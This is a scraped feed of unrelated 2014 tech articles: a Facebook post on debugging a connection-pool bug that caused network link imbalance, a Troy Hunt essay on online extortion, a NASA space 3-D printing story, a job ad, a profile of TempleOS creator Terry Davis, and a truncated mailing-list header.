As we’re building and running systems at Facebook, sometimes we encounter metastable failure states. These are problems that create conditions that prevent their own solutions. In gridlocked traffic, for example, cars that are blocking an intersection keep traffic from moving, but they can’t exit the intersection because they are stuck in traffic. This kind of failure ends only when there is an external intervention like a reduction in load or a complete reboot.

This blog post is about code that caused a tricky metastable failure state in Facebook’s systems, one that defied explanation for more than two years. It is a great example of interesting things that happen only at scale, and how an open and cooperative engineering culture helps us solve hard problems.

Aggregated Links

Some packets inside a data center traverse several switches to get from one server to another. The switch-to-switch connections on these paths carry a lot of traffic, so these links are aggregated.

An aggregated link uses multiple network cables to carry traffic between the same source and destination. Each packet goes over only one cable, so the switches need a strategy for routing the packets. For TCP traffic, Facebook configures the switches to select the link based on a hash of source IP, source port, destination IP, and destination port. This keeps all the packets of a TCP stream on the same link, avoiding out-of-order delivery. There are lots of streams, so this routing scheme evenly balances the traffic between the links.

Except when it doesn’t.

The reality is that sometimes most of the active TCP connections would be hashed to a single link. That link would be overloaded and drop packets. Even worse, this failure state was metastable. Once an imbalanced link became overloaded, the rest of the links would remain uselessly idle until traffic was drained or the hash algorithm was changed.

For two years, we tackled this problem at the switch level. We worked with our vendors to detect imbalance and rapidly rotate the hash function’s seed when it occurred. This kept the problem manageable. As our systems grew, however, this auto-remediation system stopped working as well. Often, when we would drain an imbalanced link the problem would just move to another one. It was clear that we needed to understand the root cause.

The Clue

The link imbalance occurred on multiple vendors’ switch and router hardware. It had multiple triggers: Sometimes the trigger was transient network congestion, such as a large bulk transfer; sometimes it was hardware failure; and sometimes it was a load spike in database queries. It wasn’t confined to a particular data center. We suspected that it was a metastable state because it would outlast the trigger, but because there were lots of patterns, it was difficult to separate cause and effect.

We did find one robust clue: The imbalanced links always carried traffic between MySQL databases and the cache servers for TAO, our graph store for the social graph.

It seemed likely that TAO’s behavior was causing the imbalance, but we had no plausible mechanism. The hash algorithm, source IP, destination IP, and destination port didn’t change during the onset of the problem; the source IP port was the only variable factor. This implies that the switch wasn’t at fault because the route is predestined before the switch gets the SYN packet. On the other hand, the TAO server couldn’t be at fault, because its pick is pseudo-random and blind. Even if the server were aware that the links were aggregated – and it isn’t – the server doesn’t know the hash algorithm or hash seed, so it can’t choose a particular route.

Lots of eyes looked at the code involved, and it all seemed correct. We weren’t using any non-standard switch settings or weird kernel settings. The code was ordinary and hadn’t had any significant changes since a year before the link imbalance bug first surfaced. We were stumped.

Collaboration and Collusion

Facebook’s culture of collaboration proved key. Each layer of the system seemed to be working correctly, so it would have been easy for each team to take entrenched positions and blame each other. Instead, we decided that a cross-layer problem would require a cross-layer investigation. We started an internal Facebook group with some network engineers, TAO engineers, and MySQL engineers, and began to look beyond each layer’s public abstractions.

The breakthrough came when we started thinking about the components in the system as malicious actors colluding via covert channels. The switches are the only actors with knowledge of how packets are routed, but TAO is the only actor that can choose a route. Somehow the switches and TAO must be communicating, possibly with the aid of MySQL.

If you were a malicious agent inside the switch, how would you secrete information to your counterparty inside the TAO application? Most of the covert channels out of the switch don’t make it through Linux’s TCP/IP stack, but latency does – and that was our light-bulb moment. A congested link causes a standing queue delay, which embeds information about the packet routing in the MySQL query latency. Our MySQL queries are very fast, so it is easy to look at the query execution times and tell if it went across a congested link. Even a congestion delay of 2 milliseconds is clearly visible with application-level timers.

The receiving end of the collusion must be in code that manages connections, and that has access to timing information about the queries. TAO’s SQL connection pool seemed suspect. Connections are removed from the pool for the duration of a single query, so careful bookkeeping by a malicious agent inside the pool could record timings. Since the timing information gives you a good guess as to whether a particular connection is routed over a congested link, you could use this information to selectively close all of the other connections. Even though new connections are randomly distributed, after a while only the congested links would be left. But who would code such a malicious agent?

Unintended Consequences in a Custom MySQL Connection Pool

Surprisingly, the code for the receiving agent was present in the first version of TAO. We implemented an auto-sizing connection pool by combining a most recently used (MRU) reuse policy with an idle timeout of 10 seconds. This means that at any moment, we have as many connections open as the peak number of concurrent queries over the previous 10 seconds. Assuming that query arrivals aren’t correlated, this minimizes the number of unused connections while keeping the pool hit rate high. As you’ve probably guessed from the word “assuming,” query arrivals are not uncorrelated.

Facebook collocates many of a user’s nodes and edges in the social graph. That means that when somebody logs in after a while and their data isn’t in the cache, we might suddenly perform 50 or 100 database queries to a single database to load their data. This starts a race among those queries. The queries that go over a congested link will lose the race reliably, even if only by a few milliseconds. That loss makes them the most recently used when they are put back in the pool. The effect is that during a query burst we stack the deck against ourselves, putting all of the congested connections at the top of the deck.

No individual cache server can overload a link, but the deck-stacking story plays out simultaneously on hundreds of machines. The net effect is that the TAO system continually probes all of the links between it and the databases, and if it finds a slow link it will rapidly shift a large amount of traffic toward it.

This mechanism explains the multitude of causes and the robustness of the effect. The link imbalance bug doesn’t create congestion but makes it metastable. After some other problem causes a link to saturate, the connection pool shifts traffic in a way that keeps the link saturated even when the original trigger is removed. The effect is so strong that the time lag between changing a switch’s hash and draining its outbound queue can allow the problem to reoccur with a new set of connections.

Simple Fix

The fix is very simple: We switched to a least recently used (LRU) connection pool with a maximum connection age. This uses slightly more connections to the database, but the databases can easily handle the increase.

We wanted to be completely sure we had resolved the problem, so we took the extra step of manually triggering it a few times. When we fixed the connection pool, we included a command that would let us switch between the old and new behavior at runtime. We set the policy to MRU, and we manually caused a congested link. Each time, we watched the imbalance disappear within seconds of enabling the LRU policy. Then, we tried unsuccessfully to trigger the bug with LRU selected. Case closed.

But how would this impact Facebook's new fabric network? Facebook’s newest data center in Altoona, Iowa, uses an innovative network fabric that reduces our reliance on large switches and aggregated links, but we still need to be careful about balance. The fabric computes a hash to select among the many paths that a packet might take, just like the hash that selects among a bundle of aggregated links. The path selection is stable, so the link imbalance bug would have become a path imbalance bug if we hadn’t fixed it.

Lessons Learned

The most literal conclusion to draw from this story is that MRU connection pools shouldn’t be used for connections that traverse aggregated links. At a meta-level, the next time you are debugging emergent behavior, you might try thinking of the components as agents colluding via covert channels. At an organizational level, this investigation is a great example of why we say that nothing at Facebook is somebody else’s problem.

Thanks to all of the engineers who helped us manage and then fix this bug, including James Paussa, Ernesto Ovcharenko, Mark Drayton, Peter Hoose, Ankur Agrawal, Alexey Andreyev, Billy Choe, Brendan Cleary, JJ Crawford, Rodrigo Curado, Tim Eberhard, Kevin Federation, Hans Fugal, Mayuresh Gaitonde, CJ Infantino, Mark Marchukov, Chinmay Mehta, Murat Mugan, Austin Myzk, Gaya Nagarajan, Dmitri Petrov, Marco Rizzi, Rafael Rodriguez, Steve Shaw, Adam Simpkins, David Swafford, Wendy Tobagus, Thomas Tobin, TJ Trask, Diego Veca, Kaushik Veeraraghavan, Callahan Warlick, Jason Wilbanks, Jimmy Williams, and Keith Wright.

The Increasing Trend of Online Extortion

14 hours 34 min ago

I heard about this guy, walked into a federal bank with a portable phone, handed the phone to the teller, the guy on the other end of the phone said: “We got this guy’s little girl, and if you don’t give him all your money, we’re gonna kill ‘er.”

Did it work?

F**kin’ A it worked, that’s what I’m talkin’ about! Knucklehead walks in a bank with a telephone, not a pistol, not a shotgun, but a f**kin’ phone, cleans the place out, and they don’t lift a f**kin’ finger.

Did they hurt the little girl?

I don’t know. There probably never was a little girl — the point of the story isn’t the little girl. The point of the story is they robbed the bank with a telephone.

This is out of the opening scene of Pulp Fiction and clearly, it’s fictitious. Except for when it isn’t:

Brian Krebs reported on this a few months ago and it’s about as brazen as you’d expect online criminals to get; give us money or we’ll mess up your stuff. It’s the mob protection racket of the digital era only more random with less chance of getting caught and not as many gold necklaces (I assume). That one bitcoin is about $400 American dollars today so enough for a tidy little return but not enough that it makes for an unachievable ransom for most small businesses.

The worrying thing is though, this is just part of a larger trend that’s drawing online criminals into the very lucrative world of extortion and we’re seeing many new precedents in all sorts of different areas of the online world. Let me show you what I mean.

Destroying a business via the web

Let’s say you have a hankering for a plate of lion meat one day (you heard me) so you do a Google search and find the perfect restaurant – but it’s shut on weekends. Bugger. So you go somewhere else as do all the other exotic food hunters looking for the king of the jungle with a side of fries. This was the fate the Serbian Crown in the US met with earlier this year (that’s a web archive link, do make sure your sound is turned way up to enjoy the full experience):

You see, some enterprising soul had decided to take the initiative of creating a Google Places entry for the joint and misrepresented their operating hours:

It turned out that Google Places, the search giant’s vast business directory, was misreporting the Serbian Crown’s hours. Anyone Googling Serbian Crown, or plugging it into Google Maps, was told incorrectly that the restaurant was closed on the weekends

The point of all this is that when it comes to letters of extortion, attackers can actually be quite effective in carrying out their threats. They can destroy businesses to that extent that a Bitcoin or two to keep it alive suddenly doesn't seem like such a bad deal and that’s enormously worrying. But the spate of extortion we’ve seen this year goes well beyond mere threats to damage the victim’s business, increasingly the attacker already owns the target and now they’re talking ransom.

Corporate espionage and ransom

I’ve actually had this blog post in draft for a little while, adding pieces to it as new events occurred. The catalyst for completing it was this one:

This was allegedly “on every computer all over Sony Pictures nationwide” today. The referenced zip file contains a couple of hundred meg of text files with file listings that look legit. If you take this at face value (and given they’ve demonstrated they had control of a number of Sony Pictures Twitter accounts that’s the safe assumption to make), that’s a huge amount of sensitive data they’re sitting on. Here’s just a snippet of what I found this morning:

It’s not clear what #GOP has demanded from Sony but what is clear is that they potentially have hold of a whole heap of very sensitive data there. At the time of writing, their deadline was going on half a day ago and there was still no mass release of data to the public so clearly it was an empty threat, right? Or did Sony pay up? Does anyone pay up? Apparently yes.

An extortion success story: Nokia

Earlier this year there was a report that in 2007, Nokia paid an extortionist “several million euros” for some encryption keys.  Holy crap does this business pay! Sometimes.

The problem in a case like this is that paying the extortion made good financial sense to Nokia. Had someone started to exploit those keys to sign packages with which could then be installed on their devices under Nokia’s identity, they could have taken a massive hit on consumer confidence at a time when they were just starting to lose serious market share.

Think extortionists are just targeting corporate entities? Think again, everyday consumers are getting hit too.

The mechanics of the iCloud “hack” and how iOS devices are being held to ransom

It’s not just the big guys getting hit with ransoms, every day consumers are getting pinged by attackers too. Back in May I wrote about this:

This especially hit unsuspecting Aussies for reasons which weren’t apparent at the time, but later turned out to be as a result of phishing pages which inevitably had a penchant for targeting those of us down under. Whilst this was often reported as being malware, there was no “ware” to it, rather it was a case of the attacker simply using the “Find My iPhone” feature to remotely lock the device and when no lock screen PIN existed and set one of their own. You got the PIN once you paid the cash. It was ingeniously simple.

Of course consumers have been hit with ransoms before, CryptoLocker is a perfect example of this. You get malware via one of the usual means, all your things get encrypted and then the attacker demands money to release the private key to you. That’s another one that has been quite effective down here with a particularly high profile case of a doctor’s surgery being hit a couple of years back.

A seemingly endless stream of ransoms

Ransoms seem to be really hitting their straps as of late. Beyond all the cases above, there are incidents like Dominos in France back in June with the hackers demanding €30,000 and speculation rife both about it having been paid and rejected. Probably only Dominos and the attackers know for sure.

The month after that it was the European central bank getting hacked and allegedly threatened by an extortionist.

A month later again and Android phones are accusing people of liking their pets just a little bit too much and demanding cash lest you be reported to the FBI who are apparently interested in such things.

Just last week it was the city of Detroit getting owned with attackers wanting a couple of thousand Bitcoins for their troubles. Detroit of all places! Aren’t they the ones in financial dire straits?!

Ransoms will increase because they make good sense

Think about it: you don’t have to come face to face with anyone as in the extortion rackets of old, you can run the whole gig from your office / bedroom / dungeon, there’s more and more connected stuff with more and more vulnerabilities, we’re both personally and professionally more dependent than ever on online services and best of all, we’ve got easy access to crypto currency for when victim's pay up!

Well actually, even better than that (for the attackers at least) because it makes good financial sense for victims to pay because in many cases the attackers have done a damn good job. That’s not an endorsement of the ethics of the whole thing, rather an observation that in many of these cases, they’ve actually left the victim with little choice: pay or be seriously inconvenienced. They’re making the return on investment too attractive to say “no”, and that’s an extremely worrying trend.

It’s even better than walking into the bank with a phone, these days you just send an anonymous email.

Leaving comments is awesome, please do. All I ask is that you be nice and if in doubt, read Comments on troyhunt.com for guidance.

The First 3-D Printer in Space Makes Its First Object: A Spare Part

14 hours 34 min ago

After a series of calibration tests, the first 3-D printer to fly to outer space has manufactured its first potentially useful object on the International Space Station: a replacement faceplate for its print head casing.

"An astronaut might be installing it on the printer," said Aaron Kemmer, the chief executive officer of Made In Space, which built the 3-D printer for NASA's use.

The 9.5-inch-wide contraption was delivered to the space station by a robotic SpaceX Dragon cargo ship in September, and NASA astronaut Butch Wilmore set it up inside the station's experimental glovebox a week ago.

NASA via Made In Space

NASA astronaut Butch Wilmore, the International Space Station's commander, holds up the first 3-D-printed part made in space. It's a replacement print head faceplate, which holds internal wiring in place within the 3-D printer's extruder. The faceplate, which bears the logos for Made in Space and NASA, measures roughly 3 by 1.5 inches (7.6 by 3.8 centimeters) with a thickness of a quarter-inch (6 millimeters).

Since then, the crew has been printing out plastic test patterns, or "coupons," to check how the machine works in zero gravity. "Everything worked exactly as planned, maybe a little better than planned," Kemmer told NBC News. He said only two calibration passes were needed in advance of the first honest-to-goodness print job, which finished up at 4:28 p.m. ET Monday and was pulled out of the box early Tuesday.

"It's not only the first part printed in space, it's really the first object truly manufactured off planet Earth," Kemmer said. "Where there was not an object before, we essentially 'teleported' an object by sending the bits and having it made on the printer. It's a big milestone, not only for NASA and Made In Space, but for humanity as a whole."

Made In Space's 3-D printer is similar to the earthly variety: A thin filament of ABS plastic is fed through the machine, melted and then extruded through the print head to build up the desired object, layer by thin layer. Over the course of hours, the printer's computer program controls precisely where the squirts of plastic are directed.

On Earth, 3-D printers can make toys and tchotchkes, or plastic pistols and prosthetics. In space, astronauts may someday count on 3-D printers to make tools or spare parts from standard-issue feedstock, rather than having to rely on a stockpile of hardware flown up from Earth at a cost of $10,000 a pound. That capability will be particularly important for trips to Mars — because in deep space, no one can point you to a hardware store.

However, the space environment poses challenges for 3-D printing technology. Does the machine work in weightlessness the way it does in Earth's gravity? Can the plastic be built up into predictable structures? How easy is it to remove the finished part?

NASA reported that the replacement faceplate adhered more strongly to the machine's print tray than anticipated, "which could mean layer bonding is different in microgravity, a question the team will investigate as future parts are printed."

Niki Werkheiser, program manager for the project at NASA's Marshall Space Flight Center, said she and her colleagues are learning a lot, even from the first print.

"As we print more parts we’ll be able to learn whether some of the effects we are seeing are caused by microgravity or just part of the normal fine-tuning process for printing," Werkheiser said in a NASA news release. "When we get the parts back on Earth, we’ll be able to do a more detailed analysis to find out how they compare to parts printed on Earth.”

This 3-D printer is primarily a demonstration project. Over the next few months, a variety of items will be printed out in space, including an object designed under the auspices of a contest for students. The lessons learned will be factored into the design of a fuller-featured printer to be sent to the station sometime in the next year or so.

"You can imagine something like the Wright Brothers flight," Kemmer said. "They learned a lot when they flew that first time, then they iterated their design. That's where we're at, in the learning and iterating phase."

Eventually, digital blueprints for printed objects will be customized on Earth, then beamed up to the station for production. Made In Space is also working on a recycling device. "That will close the loop completely," Kemmer said. "You take the [plastic] trash, throw it into a recycler, turn it into feedstock, and print with the recycled feedstock. And when you're done with the part, you can recycle it again."

So will the print head part that was created today someday become the feedstock for another item printed out in space? Not a chance. NASA plans to send the part back down to Earth for analysis — and if Kemmer has anything to say about it, the first object made in space will eventually wind up in a museum.

First published November 25 2014, 12:15 PM

Teespring (YC W13) Is Looking for Senior UI/Front-end Engineers

14 hours 34 min ago
Overview Teespring, an innovative web-based crowdfunding platform and tech startup, is seeking a Sr. UI/Front End Engineer for its San Francisco office. A graduate of the Winter 2013 class Y-Combinator, Teespring launched in 2011 and has helped its users sell over 2 million shirts to date. We are hunting for engineers to work on problems that contribute directly to our two main goals: growing the company and making our users happy. We are among the fastest growing new companies in the country and are always on the lookout for engineering talent to help sustain our growth and product.

Description We are looking for a Sr. UI Engineer that has extensive experience with object-oriented JavaScript, HTML5, and CSS3. You will be responsible for building out our next-generation mobile applications. We encourage innovation, creativity, and a think outside of the box attitude when solving complex problems and implementing new solutions. You should have a strong passion for design and product development with solid communication skills as you will be interacting with all teams, in particular the product and creative teams.

The front-end engineer will help us push the boundaries of what is possible. You'll work side by side with outstanding designers. You should be proficient in HTML, CSS and Javascript. You should appreciate the details that make a front-end user experience memorable, and demonstrate enthusiasm for new front-end technologies.

We offer a highly competitive benefits package including base salary, full benefits, annual and spot bonuses, and a great work environment.

What the UI Engineer will need: 5+ years of experience as a Software Engineer with a focus on UI and firm understanding of Front End best practices. Expert experience with object-oriented JavaScript and frameworks such as Backbone.js, NodeJS, Knockout, AngularJS, batman.js, Closure Experience with HTML5, CSS3, SASS (we use SCSS), jQuery as well as comfortable writing native Javascript. Proficient with Adobe Creative Suite (Photoshop mainly) Ability to own and execute complex projects Bachelor’s Degree in Computer Science or equivalent work experience is required

Nice to have as a UI engineer: High Traffic Social Network, Gaming or Web Experience Experience with Agile/Scrum Experience with Front-End performance testing and optimization. Experience working with Rails and Grunt/Gulp JS Experience with OOCSS Experience with HAML/Slim templating engines Experience with Javascript Testing Frameworks like Jasmine, Mocha, QUnit a plus!

What’s in it for the UI Engineer: Competitive base salary Relaxed work environment (Kegerator, ping-pong table, lounge areas) Flexible work schedule Company sponsored events

Email resume to ashley.hearn@teespring.com to learn more

God's Lonely Programmer

25 November 2014 - 8:00pm

In the beginning there is darkness. The screen erupts in blue, then a cascade of thick, white hexadecimal numbers and cracked language, "UnusedStk" and "AllocMem." Black screen cedes to blue to white and a pair of scales appear, crossed by a sword, both images drawn in the jagged, bitmapped graphics of Windows 1.0-era clip-art—light grey and yellow on a background of light cyan. Blue text proclaims, "God on tap!"

This is TempleOS V2.17, the welcome screen explains, a "Public Domain Operating System" produced by Trivial Solutions of Las Vegas, Nevada. It greets the user with a riot of 16-color, scrolling, blinking text; depending on your frame of reference, it might recall ​DESQview, the ​Commodore 64, or a host of early DOS-based graphical user interfaces. In style if not in specifics, it evokes a particular era, a time when the then-new concept of "personal computing" necessarily meant programming and tinkering and breaking things.

Gif by the author

It’s all innocuously familiar. You see a sprite-based first person shooter called Castle Frankenstein and a dollar-bill icon that opens a budgeting application. Vocab is a multiple-choice quiz (can you define "folliculous"?). A Battlezone homage opens with the admonishment, "Write games, don’t play them!"

Then there are less mundane features. Pressing F7 anywhere in TempleOS summons a pseudo-random "tongues word." Five F7s at the command prompt might produce downmarket Dada like "flashedt ARE evil madly peacemaker." Shift-F7 inserts a Bible passage. (Or, less revelatory, the copyright notice from Project Gutenberg’s e-text Bible.) Jukebox offers a collection of PC-speaker tunes with Biblically inspired lyrics, like this gloss on Mark 4:37: Lord, there’s a storm upon the sea / Lord, there’s a storm upon the sea /<="" em="" style="background-color: initial;"> Relax, fellas / (Sea became glass).

TempleOS is more than an exercise in retro computing, or a hobbyist’s space for programming close to the bare metal. It’s the brainchild—perhaps the life’s work—of 44-year-old Terry Davis, the founder and sole employee of Trivial Solutions. For more than a decade Davis has worked on it; today, TempleOS is 121,176 lines of code, which puts it on par with Photoshop 1.0. (By comparison, Windows 7, a full-fledged modern operating system designed to be everything to everyone, filled with decades of cruft, is ​about 40 million lines.)

He’s done this work because God told him to. ​According to the TempleOS charter, it is "God’s official temple. Just like Solomon's temple, this is a community focal point where offerings are made and God's oracle is consulted." God also told Davis that 640x480, 16-color graphics "is a covenant like circumcision," making it easier for children to make drawings for God. God demands a perfect temple, and Davis says, "For ten years, I worked on programming TempleOS, full time. I finished, basically, and the last year has been tiny touch-ups here and there."

Within TempleOS he built an oracle called AfterEgypt, which lets users climb Mt. Horeb along with a stick-figure Moses. At the summit, a round scrawl of rapidly changing color comes into sight—the burning bush. Before it you should praise God. You can praise Him for anything, Davis says, including sand castles, snowmen, popcorn, bubbles, isotopes, and sand crabs.

"The Holy Spirit can puppet you," the screen reads. When you press the spacebar, an onscreen timer stops, and a corresponding Biblical passage appears. "Sometimes interpretation is tricky," Davis says in ​one of his many YouTube demonstrations. He describes this AfterEgypt oracle as a technical improvement on speaking in tongues or using a Ouija board, and points to 1 Corinthians 14:2: "For one who speaks in a tongue does not speak to men but to God; for no one understands, but in his spirit he speaks mysteries."

Davis hasn’t hesitated to speak to the world about God’s digital temple. Back in 2004, he was calling it ​the ​J Operating System and ​​OSNews profiled his work. He later renamed it LoseThos—a somewhat murky reference to a scene in Platoon—and had a ​productive conversation with the contributors at MetaFilter, where his work was introduced as "an operating system written by a schizophrenic programmer."

He has been diagnosed with schizophrenia, having dealt with mental health issues since the mid-1990s. Because Davis often communicates in blocks of text produced by his oracle, or with apparently off-topic declarations about God, he’s had accounts ​​banned from SomethingAwful and Reddit. He can be aggressive and confrontational, sometimes denouncing critics with profanity and call them "nigger."

This has gotten him ​"shadowbanned" on Hackernews, meaning he's visible only to users who’ve explicitly chosen to see his "dead" posts, and has led to a lengthy discussion about how to manage a fellow message board member’s mental illness. MetaFilter and ​​Reddit have similarly touching, frustrating conversations among people grappling with basic questions of empathy and community.

But none of this is the recognition Davis is looking for in building God’s temple. "It's nice when getting attention," he says, "but now I know what it's like." It rarely means more people using TempleOS to talk to God.

So, what compelled him to build a 16-color world in worship? I wanted to understand, as best I could, how he’s spent a decade as God’s lonely programmer, a voice in the wilderness shouting the good news.

<="" em="">

He drinks a lot of caffeine and lives mostly on a 48-hour schedule

<="" em="">

<="" em="">

<="" em="">

<="" em="">

<="" em="">

<="" em="">

<="" em="">

<="" em="">

<="" em="">

<="" em="">

<="" em="">

<="" em="">

<="" em="">

Davis emails me regularly and late into the night, in Courier font, from a two or three year-old Dell desktop running Ubuntu. Unable to work, he collects Social Security disability and spends most of his time coding, web surfing, or using the output from the ​​National Institute of Standards and Technology randomness beacon to talk to God—he posts the results on his webpage as "Terry Davis’ Rants."

He drinks a lot of caffeine and lives mostly on a 48-hour schedule: "I stay awake 16*2 and sleep 8*2." He shares a house with his parents and a pair of cockatiels. Of his parents he says, "We don't interact that much."

Terry Davis was born in December 1969, in West Allis, Wisconsin, just west of Milwaukee, the seventh of eight children. His brothers and sisters were close, but about his relationship with them today he says, "Jesus did not talk to his siblings—he wanted nothing to do with them, strangers are better. I am the same way."

His dad was an industrial engineer, and the family moved a lot while Davis was growing up, from Wisconsin to Washington to Michigan to California to Arizona. In an elementary school gifted program, he started using an Apple II; in the early 1980s, he learned assembly language on a Commodore 64, then continued programming throughout high school. Then he enrolled at Arizona State University, where he earned his bachelor’s degree, then a master’s in electrical engineering in 1994.

After graduation he stayed in Tempe, Arizona, partly because he had a job. As an undergrad he’d been hired at Ticketmaster to program operating systems. He liked the work, but when the company shifted him to research projects that never seemed to pan out, he decided it was time to look elsewhere. He was 26, had a master’s degree, and he wanted to use that knowledge to build satellite control systems. In early 1996 he sent out some resumes to defense contractors.

He’d grown up Catholic, but later embraced atheism. "I thought the brain was a computer," Davis says, "And so I had no need for a soul." He saw himself as a scientific materialist; he believes that metaphor—the brain as a computer—has done more to increase the number of atheists than anything by Darwin. He still considers himself scientifically minded. "Today I find the people most similar to me are atheist-scientist people," he says. "The difference is God has talked to me, so I'm basically like an atheist who God has talked to."

Davis describes how that happened in a fragmentary, elliptical way, perhaps because it was such a profoundly subjective experience, or maybe because it still embarrasses him. "It’s not very flattering," he says. "It looks a lot like mental illness, as opposed to some glorious revelation from God." It was a period of tribulation, but to this day he declares, "I was being led along the path by God. It just doesn’t look very glorious."

In mid-March 1996, "I started seeing people following me around in suits and stuff. It just seemed something was strange," he says. He thought it might be part of a background check by one of his prospective employers, but it unnerved him. He began connecting it to a side-project he’d worked on involving computer control systems. And he’d been listening to Rage Against the Machine; ​the li​ne, "Some of those work forces are the same that burn crosses" stuck with him for reasons unknown.

He got thinking about conspiracy theories and the men he’d seen following him and a big idea he’d had. He spooked himself. "It would sound polite if you said I scared myself thinking about quantum computers," he says now. "And then I guess you just throw in your ordinary mental illness."

He left town. Driving south with no clear destination, he says, "I was listening to the radio and it seemed like the radio was talking to me." It spouted commentary on everything he did. He believed the end of the world was at hand. His head swam with conspiracy theories and apocalyptic foreboding.

<="" em=""> <="" em="">

<="" em=""> Gif by the author

He ended up in Marfa, Texas, where he abandoned his car—a Honda Accord his parents had given him. He’d started thinking about Big Oil and the conspiracies alleged to have suppressed more efficient, water-based engines. He’d torn off all the side panels from his car looking for a tracking device, then stopped the car and pitched the keys into the desert. He walked. A cop pulled up and ushered him into the passenger’s seat. Moments later, Davis dove out of the cruiser, breaking his collarbone.

At the hospital, he overheard doctors talking about "artifacts" on his X-ray scans. Panicked at the thought of artifacts supposedly left inside by alien abductors, he bolted from the hospital, despite the broken collarbone. When he tried to steal a pickup truck idling nearby, the police caught up with him. In jail, he reasoned that he could open his cell door by flipping the circuit breaker; he broke his glasses and stuck them into the cell’s electrical outlet, only to realize he had non-conductive frames. The police rushed in. "I think I stripped," Davis says, "because I was thinking of corporate logos being bad or something."

He was taken to a mental hospital, where he refused to eat the food, thinking it might be drugged. He broke a window with a chair. Released after two weeks, he sought to emulate Jesus by giving away all his belongings; he donated to Goodwill, and delivered presents to his siblings’ children. He may have crossed into Mexico at some point, then had to bribe his way back across the border. He just drove, looking to street signs to divine God’s will. Later he lived on the streets.

"In the Bible it says if you seek God, He will be found of you," Davis says now. "I was really seeking, and I was looking everywhere to see what he might be saying to me."

"Looking back on it, I’m not especially proud of the logic and thinking. It looks very young and childish and pathetic," Davis adds. He compares the experience to having a flip switched, one that revealed his deepest conscience and morality. "I felt guilty for being such a technology-advocate atheist," he says. He thought of the Amish and Little House on the Prairie—simple, decent ways of living with God.

In one of his rants, he writes, "In 1996, I off-handedly decided to give a few dollars to charity for the blind. I was an atheist from 1990-1996 and gave nothing to charity. Perhaps, that act caused God to reveal Himself to me and saved me." He estimates he gave about $10,000 to the Newman Center, Arizona State’s campus ministry.

By July of 1996, his mental state had calmed enough that he returned to Arizona. For the next year he lived on credit cards, trying to make a business out of a ​three-axis milling machine he’d prototyped. (It was obvious to him that 3D printing would be the next big thing, but it was also painfully slow.) After an errant Dremel tool nearly set his apartment on fire, he abandoned the idea.

Eventually he moved in with his parents in Vegas, hoping to save money while he worked on a book, a sequel to George Orwell’s 1984. He didn’t finish it.

"From 1996 to 2003, about every six months I would have what they call a manic episode and I would end up in a mental hospital," he says. He hasn’t been to a hospital since; once diagnosed as bipolar, he’s since been declared schizophrenic. He now only takes a single medication, and shrugs off the diagnosis. The label doesn’t concern him. "For those first few years, I was genuinely pretty crazy in a way. Now I'm not. I'm crazy in a different way maybe," he says. He says he’s learned not to freak out.

IT WOULD SOUND POLITE IF YOU SAID I SCARED MYSELF THINKING ABOUT QUANTUM COMPUTERS

As 64-bit computing began trickling down to desktops around 2003, Davis saw it as the next big disruption. He dusted off some code from ten years earlier, when he’d worked on operating systems for Ticketmaster and tinkered on the side. "It kind of developed on its own," he says, "I didn't plan it."

But the idea of a digital oracle grew out of his earlier methods for talking to God. At first he’d open a Bible to a random page, and it would speak. Yet he had a general sense of where the book had opened, whether he might be choosing from Genesis or Revelation. He began using coin tosses to choose a page number; then he expanded his technique to include all the books in his library. Soon he’d settled on a digital timer for his oracle, AfterEgypt.

He kept the rest of the programming simple. God told him to stick to 640x480 and 16 colors, with only a single audio voice. Like Noah, he built as he was commanded. "It’s really obvious what to do next," he says, "and it can keep you busy for the first ten years." But now he’s finished.

"The way God works is he caused the course of my life. I can see how it's been a charmed life in some ways, so I think He planned it," Davis says. Sometimes he seems to believe TempleOS will exist for 1,000 years, that it will be embraced and perfected by the giants of Silicon Valley, and that he will be recognized as King Solomon 2.0. Other times he seems less certain, even vulnerable to doubt. "Is it going to be as big as Solomon's Temple?" he asks. "I don't know. But we'll see. What else is there?"

<="" em=""><="" em=""> <="" em="">

<="" em=""><="" em="">Gif by the author

He talks to God constantly, and his God is conversational, even chatty. In fact, Davis believes he's proven God speaks to him. He believes anything can be an oracle; that the divine word reveals itself through randomness.

At least a dozen times on his webpage, ​ ​he describes putting a question to his mother. If he won the lottery three times, he asks, would she believe? No, she responds, because improbable things happen all the time. "I can sit down with my parents and praise God and open the Bible randomly," he says, "and it will talk." For him this is both astounding and undeniable, an ongoing revelation, like winning the lottery ten times every day. Yet, he says, "They just ignore it because i​t's against their way of thinking. They just ignore the facts."

<="" em=""><="" em="">

Is it going to be as big as Solomon's Temple? I don't know

<="" em=""><="" em="">

<="" em=""><="" em="">

<="" em=""><="" em="">

<="" em=""><="" em="">

<="" em=""><="" em="">

<="" em=""><="" em="">

<="" em=""><="" em="">

<="" em=""><="" em="">

<="" em=""><="" em="">

<="" em=""><="" em="">

<="" em=""><="" em="">

<="" em=""><="" em="">

<="" em=""><="" em="">

Terry Davis asks God about war ("Servicemen competing") and death ("awful"), about dinosaurs ("Brontosaurs' feet hurt when stepped") and His favorite video game ("Donkey Kong"). God’s favorite car is a "Beamer," and His favorite singer is Mick Jagger, though if He could sing He’d want to sound like Christopher Hall from Stabbing Westward. His favorite national anthem is Latvia’s. His favorite band is, no surprise, The Beatles, but Rush and Triumph are pretty good, too. Classical music is poison. The best thing Bill Gates could do to save lives, God says, is work on earthquake prediction. The Eleventh Commandment is "Thou shall not litter." Terry Davis tells God everything seems bad. God replies: "Plant trees."

The words pour out on TempleOS.org, a torrent of verified random numbers, news links, YouTube videos, and scriptural exegesis. It’s the dense work of a single, restless mind writing ceaselessly without an audience.

After two months of emails and phone conversations, I know more than when I began; specifically, I’ve accumulated more raw data, more facts about his life and experience. But I suspect I’ve only sketched a shadow. The full reality remains unreachable, an irreducible mystery.

One morning, Davis emailed me about this story, saying, “What people are going to read is, 'It's about a pathetic schizophrenic who made a crappy operating system.' My perspective is, 'God said I made His temple.'" It echoed something he’d written before: "I don't care much about you and your story. It's not likely to be what it actually is—world news with God claiming His temple."

I can’t disagree. Theophany belongs to those who can see, and the rest are barred from its consolation. Davis believes he has proven he can talk to God through random numbers; he calls his parents sheep, because they cannot believe this. The word they—we—have for him is schizophrenic, and the condition is never cured, only treated. Terry Davis has offered the world a temple to a God who speaks only to him, and is and still waiting for everyone else to listen.

Why HTTPS Everywhere isn't on addons.mozilla.org (AMO)

25 November 2014 - 8:00pm
[HTTPS-Everywhere] HTTPS-Everywhere needs to be on firefox addons

Yan Zhu yan at eff.org
Mon Apr 21 11:14:26 PDT 2014

